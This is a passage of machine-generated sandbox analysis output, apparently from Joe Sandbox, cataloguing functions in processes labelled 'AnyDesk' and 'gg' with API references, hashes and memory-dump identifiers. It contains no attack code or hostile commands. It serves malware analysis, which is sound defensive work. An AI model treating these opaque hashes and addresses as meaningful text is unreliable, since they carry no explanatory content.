                                                                                                                                                                                                                                                  • Instruction ID: 7846d06c2348b54a9dbf1932d71fe144ddaec73802d863accbcd7f243446e43d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3f1846b3b7ea1082508326226399beb31eeb927324f233f83340a69e436c061
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92E0ED702007908BE7308F39E18875A7BF8AF91300F008C1CD45ACA600FBB4D0448FB2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FBB2: std::exception::exception.LIBCONCRT ref: 69C3FBBF
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                    • Part of subcall function 69C42BD6: RaiseException.KERNEL32(?,?,?,69C413B7,00000000,00000000,00000000,?,?,?,?,?,69C413B7,?,69C7B2E0), ref: 69C42C35
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                  • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                  • Opcode ID: 0a57ce79f315d66c702265ecb659309d2366396ac86aef17a71c0267804ad534
                                                                                                                                                                                                                                                  • Instruction ID: 59df7f41faa0e027d69ac3f5af35e729348e72ed24c01e18bfb9704c83941158
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a57ce79f315d66c702265ecb659309d2366396ac86aef17a71c0267804ad534
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73D0A73CA002087BCB10DEE5F861D8C7B7C6E04204BC0C4A9A918C7040F770EA4686D1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 69C54407
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C54415
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 69C54470
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                                  • Opcode ID: a252753ea3ddd9e00cfd7ed00269e276aa7313eab9b495e7fc1211c00705224e
                                                                                                                                                                                                                                                  • Instruction ID: dbe5af2d0f73d0db38a828bbd3e7a08039b1a47f7925168ebfa1512390c7572f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a252753ea3ddd9e00cfd7ed00269e276aa7313eab9b495e7fc1211c00705224e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94410631644216AFDB118F65E844BAA7BB9FF41360F108168FD6A9B1A0F7308D31C775
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:14.5%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:120
                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: XX^q$XX^q
                                                                                                                                                                                                                                                  • API String ID: 0-1102689228
                                                                                                                                                                                                                                                  • Opcode ID: 8aa4fa37a454e38168ae8703e759da58e39fb9324f9d6981384c230168e64257
                                                                                                                                                                                                                                                  • Instruction ID: 460719b3e7b53f2164a72699e8560e2895260090f451fa61627dc7e47df67bde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa4fa37a454e38168ae8703e759da58e39fb9324f9d6981384c230168e64257
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCD1A030B10206AFDB54EB79D89466EB7E3FF80210F508929D5169B7A4DF70EC89CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b289fa1e0b16dc9fba7097722315d473c3d98348b663c0aba806d6153a7345d7
                                                                                                                                                                                                                                                  • Instruction ID: 11ff93f20f70649c0a2da122bd3010260516a398d1c4136c461953546e087165
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b289fa1e0b16dc9fba7097722315d473c3d98348b663c0aba806d6153a7345d7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAD19C35A002059FCB44CF79D984AAEBBF6FF89304B158569E815EB361DB30EC51CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8d49f59a14c2362850611e6659082bfeed3c48a8d5e66f5d1a0a8e38f9d8e863
                                                                                                                                                                                                                                                  • Instruction ID: a3c538e7fceb9807d35deedb803ad21f21b7644ac8966ebc6846a7319cb39632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d49f59a14c2362850611e6659082bfeed3c48a8d5e66f5d1a0a8e38f9d8e863
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC18D30B102069FDB54EF75D9847AAB7A2FF84300F409938D6069B765DB70E889CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq$(bq$(bq
                                                                                                                                                                                                                                                  • API String ID: 0-2716923250
                                                                                                                                                                                                                                                  • Opcode ID: d7566c26a159683a443b4bac5f77be50a11e3b7e4c039797c109f1a5ab39be4d
                                                                                                                                                                                                                                                  • Instruction ID: 797514a60ff328a68f01990fc3b6d22d0e548e45f8ec98dd39427c3dafcc6c4a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7566c26a159683a443b4bac5f77be50a11e3b7e4c039797c109f1a5ab39be4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2C18F31A142505FCB55DB28D84066DBFAAEF81314B29C5AAD855DF382C632ED42C7E4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1299 63f2ff2-63f306f call 63f076c GetKeyboardLayout 1304 63f3078-63f3094 1299->1304 1305 63f3071-63f3077 1299->1305 1305->1304
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 063F305E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: KeyboardLayout
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 194098044-3558239423
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 063F314D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 2538663250-3558239423
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 063F314D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID: ()<c
                                                                                                                                                                                                                                                  • API String ID: 2538663250-3558239423
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 063F3318
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 6842923-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1949247347.00000000063F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_63f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 43c5bd42932eb6667520946324e74430bab8a28fec9a69ee6044e2e97e392ea6
                                                                                                                                                                                                                                                  • Instruction ID: cf6e76adebf6d5e499ea9e122066a826fb1772acfd3459b4b5307cc579cfd354
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c5bd42932eb6667520946324e74430bab8a28fec9a69ee6044e2e97e392ea6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F911730E112499FDB54DFA8D898AADBBF2FF88300F148429E506AB395DB74AC45CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: 628f93e4e1073c02b32d38302296288e8e796c5a85430b7f81d980b9b519d096
                                                                                                                                                                                                                                                  • Instruction ID: d8eca244f22062959f3216ec51a4263c56483ec6d644295b5de3f9bb4ff13f1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 628f93e4e1073c02b32d38302296288e8e796c5a85430b7f81d980b9b519d096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69818C30B10205DFDB14DF68D994AAEBBF6FF88300F158469E906A7351DB71AC45CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq
                                                                                                                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                                                                                                                  • Opcode ID: db98ad1bf9cfa72474cea53ecb105b84b69a3d568e5185c68fdb0a3fd689e469
                                                                                                                                                                                                                                                  • Instruction ID: 61319655bed97d8926477da7c68411fa55bb1e9079fe872bc4aabce5393a5ff1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db98ad1bf9cfa72474cea53ecb105b84b69a3d568e5185c68fdb0a3fd689e469
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06319E74B042449FCB15AF79D95486E7BFBEF8521072444AAE809CB391DF36EC02CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: `Q^q
                                                                                                                                                                                                                                                  • API String ID: 0-1948671464
                                                                                                                                                                                                                                                  • Opcode ID: 5514e6bbb06ef848627b44d5574c34adc73690f59a84fcbc7557caa870924662
                                                                                                                                                                                                                                                  • Instruction ID: b416b25fc1aea373aacea903635edb7a8e60866412460843137f3f7248541576
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5514e6bbb06ef848627b44d5574c34adc73690f59a84fcbc7557caa870924662
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D321C335E10615DBCB60DFB5E9006EEB7A1FF44A50F1441AACA09D7280DB359A54CB82
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6630000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: b5035d66dd9876fcb915e7f26146f6374ae4d1abcf1070a589950c6f73269e66
                                                                                                                                                                                                                                                  • Instruction ID: 3f4028890ef14298b6ec6e06c54301f30871f9653e2d9e329ab62b6b33c2680c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5035d66dd9876fcb915e7f26146f6374ae4d1abcf1070a589950c6f73269e66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4112931B093A45FD3559F3DD811A5A7FEA9FC6250719806AE445CB3C1DE34DC42C7A1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                                                                                                  • Opcode ID: cc988a16cb17cec41f746aaf791c35d142c33b63bb7a48d42c95d2ce4ffc654e
                                                                                                                                                                                                                                                  • Instruction ID: 6dadd0c35d983567ba61e6199307a0fa1d191e03c607770cb73b7c0ad4a026fa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc988a16cb17cec41f746aaf791c35d142c33b63bb7a48d42c95d2ce4ffc654e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC1132307143424FE3049B7D9894A1A7BEAFFC9300754447AE10ACB386DE70DC06CB60
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (_^q
                                                                                                                                                                                                                                                  • API String ID: 0-538443824
                                                                                                                                                                                                                                                  • Opcode ID: f6e25a17d58f95bbd698515d64339dce9039f592b2c2d3e6e8a94de4486c1320
                                                                                                                                                                                                                                                  • Instruction ID: 4b771a41e93bfb405d286c10035ecf222ffc303ac50e19c373b78fe6d2f82517
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6e25a17d58f95bbd698515d64339dce9039f592b2c2d3e6e8a94de4486c1320
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11A136710014DFDF456FB8E80896CBBE6EB883157048476F60ACB7A1CE3ADC219B84
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6315bae7e5671b27606ebf4b399b083582c246c0f17f76bc08eb6c63ed0fd3d3
                                                                                                                                                                                                                                                  • Instruction ID: 4e8810cbb8658a437f408e6d441c8cebcd3455d14574dcbc9e894c4edfc44c03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6315bae7e5671b27606ebf4b399b083582c246c0f17f76bc08eb6c63ed0fd3d3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25C14D3191071ADFDB11DF78C854A99BBB1FF89314F118699E8496B361EB30E9C1CB80
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1eca9302e5d9bf87988dfba3aa0e0987f6a41f6839c46c0ecb8becca9ad7a870
                                                                                                                                                                                                                                                  • Instruction ID: 40f362085fa788711faae9f3b181b79c1285b74a75e372c12c6ed12e0a8f04c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eca9302e5d9bf87988dfba3aa0e0987f6a41f6839c46c0ecb8becca9ad7a870
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AA13D30A00206AFDB54EF64DD84AADF7B2FF84300F148629D5159B369DB70EC89CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bafc92ed79ff036707a988c182c9ccba53085fc2c7c96f4c65c1d517c8b5adea
                                                                                                                                                                                                                                                  • Instruction ID: 194d68946a8b4fe98877d3e4c9e952881fbea57965e8b6f8752c2dcde5dd9d0e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bafc92ed79ff036707a988c182c9ccba53085fc2c7c96f4c65c1d517c8b5adea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5818230F102199FCB58EBB8D8546AEBBF6FF84200F548469D509EB385DE34AD81CB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950464108.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
